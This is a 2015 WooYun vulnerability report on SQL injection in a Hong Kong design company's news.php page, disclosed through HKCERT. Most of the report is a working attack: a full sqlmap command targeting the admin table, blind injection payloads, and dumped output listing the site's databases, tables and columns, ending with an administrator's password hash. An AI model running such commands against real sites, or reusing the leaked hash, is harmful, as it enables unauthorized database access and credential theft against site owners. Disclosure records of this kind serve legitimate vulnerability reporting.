当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151359

漏洞标题:香港墨本設計集團某處存在SQL插入攻擊(管理員密碼泄露)(香港地區)

相关厂商:香港墨本設計集團

漏洞作者: 路人甲

提交时间:2015-11-04 18:19

修复时间:2015-12-22 13:50

公开时间:2015-12-22 13:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-04: 细节已通知厂商并且等待厂商处理中
2015-11-07: 厂商已经确认,细节仅向厂商公开
2015-11-17: 细节向核心白帽子及相关领域专家公开
2015-11-27: 细节向普通白帽子公开
2015-12-07: 细节向实习白帽子公开
2015-12-22: 细节向公众公开

简要描述:

香港墨本设计集团是墨本在香港注册的公司,专业用来与外国客户和设计师沟通的纽带。随着时代发展,公司也应用互联网+的理念,业务已从原来单一的景观设计,发展到景观规则设计+创意建筑设计+室内装饰设计。力争在设计的源头,就形成更有效服务体系。为客户供更新、更全、更广的设计理念,同时借鉴世界上优秀的案例经验和工作经验服务中国的客户!

详细说明:

地址:http://**.**.**.**/news.php?id=78

python sqlmap.py -u "http://**.**.**.**/news.php?id=78" -p id --technique=BT --random-agent --batch -D moben -T admin -C uid,id,name,pass,lv --dump

漏洞证明:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=78 AND 2306=2306
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=78 AND (SELECT * FROM (SELECT(SLEEP(5)))oNXF)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3
back-end DBMS: MySQL 5.0.12
current user:    'moben_f@localhost'
current user is DBA:    False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=78 AND 2306=2306
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=78 AND (SELECT * FROM (SELECT(SLEEP(5)))oNXF)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3
back-end DBMS: MySQL 5.0.12
database management system users [1]:
[*] 'moben_f'@'localhost'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=78 AND 2306=2306
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=78 AND (SELECT * FROM (SELECT(SLEEP(5)))oNXF)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] moben
[*] test
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=78 AND 2306=2306
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=78 AND (SELECT * FROM (SELECT(SLEEP(5)))oNXF)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3
back-end DBMS: MySQL 5.0.12
Database: moben
[7 tables]
+---------+
| admin   |
| banner  |
| imgs    |
| info    |
| news    |
| notice  |
| project |
+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=78 AND 2306=2306
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=78 AND (SELECT * FROM (SELECT(SLEEP(5)))oNXF)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3
back-end DBMS: MySQL 5.0.12
Database: moben
Table: admin
[6 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| id     | int(11)     |
| lv     | int(11)     |
| name   | varchar(80) |
| pass   | varchar(80) |
| uid    | varchar(80) |
| web    | int(11)     |
+--------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=78 AND 2306=2306
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=78 AND (SELECT * FROM (SELECT(SLEEP(5)))oNXF)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3
back-end DBMS: MySQL 5.0.12
Database: moben
Table: admin
[1 entry]
+----+-------+----------------------------------+----+
| id | name  | pass                             | lv |
+----+-------+----------------------------------+----+
| 1  | 最高管理员 | 8c1ab3991d2bed4cb3d875735122a690 | 9  |
+----+-------+----------------------------------+----+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=78 AND 2306=2306
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=78 AND (SELECT * FROM (SELECT(SLEEP(5)))oNXF)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3
back-end DBMS: MySQL 5.0.12
Database: moben
Table: admin
[1 entry]
+----------------------------------+----+-------+----------------------------------+----+
| uid                              | id | name  | pass                             | lv |
+----------------------------------+----+-------+----------------------------------+----+
| 8c1ab3991d2bed4cb3d875735122a690 | 1  | 最高管理员 | 8c1ab3991d2bed4cb3d875735122a690 | 9  |
+----------------------------------+----+-------+----------------------------------+----+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-07 13:49

厂商回复:

已將事件通知有關機構

最新状态:

暂无